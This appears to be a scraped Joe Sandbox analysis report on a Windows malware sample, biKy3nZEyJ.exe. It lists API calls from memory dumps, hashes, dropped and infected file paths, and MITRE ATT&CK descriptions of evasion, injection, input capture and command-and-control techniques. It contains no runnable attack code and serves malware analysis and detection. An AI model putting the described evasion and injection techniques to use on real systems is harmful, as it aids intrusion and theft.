strrchr.MSVCRT ref: 00C01E0B
lstrcpy.KERNEL32(?,00000001), ref: 00C01E1C
strrchr.MSVCRT ref: 00C01E2B
lstrcmpiA.KERNEL32(?,00C04488), ref: 00C01E48
lstrlen.KERNEL32(00C04488), ref: 00C01E53

Memory Dump Source

Source File: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 96a08fee5576078cf82dc70c0d775cb1628e858b84416c74a359ffec8075f1a3
Instruction ID: d932a05b267ebae3347f353bcc1a5371e7d868284407fac6741e6c3338a1420a
Opcode Fuzzy Hash: 96a08fee5576078cf82dc70c0d775cb1628e858b84416c74a359ffec8075f1a3
Instruction Fuzzy Hash: F401D6B29042596FEF205760EC4CBDFB79CDB04354F490066EF55E20D0EA749E84CBA0

Function 00C06014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00C0603C
GetProcAddress.KERNEL32(00000000,00C06064), ref: 00C0604F

Strings

kernel32.dll, xrefs: 00C0603B

Memory Dump Source

Source File: 00000001.00000002.1981517062.0000000000C06000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000001.00000002.1981427423.0000000000C00000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981450170.0000000000C01000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1981491694.0000000000C04000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c00000_TJytnf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 77e48cba5bc978512cb14b964f64b67d2f163ca4b4225a7b870a3b3b023fcbb8
Instruction ID: f34d61d3ac505ae507c2f0411a4ad90c590de356a059a2bbe133dee359d6bc83
Opcode Fuzzy Hash: 77e48cba5bc978512cb14b964f64b67d2f163ca4b4225a7b870a3b3b023fcbb8
Instruction Fuzzy Hash: DDF0CDB11402898BEF70CEA4CC44BDE3BE4EB05700F50442AEA09CB281CB348615CB28

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report biKy3nZEyJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TJytnf.exe_bf4cc6b994b3c313b3d8ecc28fe7af8bd1d8_fcda0e7d_141c3cad-1e96-4194-9768-bece39737fcb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER44CF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER46F3.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4742.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

C:\Users\user\AppData\Local\Temp\32406A5A.exe

C:\Users\user\AppData\Local\Temp\TJytnf.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
biKy3nZEyJ.exe

Function 00740044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 00447880 Relevance: 6.3, APIs: 4, Instructions: 316
COMMON

Function 0044A2E0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 316
COMMON

Function 00446D40 Relevance: 5.2, APIs: 4, Instructions: 173
COMMON

Function 00C029E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00C01099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Function 00C01718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 00C06076 Relevance: 11.1, APIs: 7, Instructions: 615
memoryCOMMON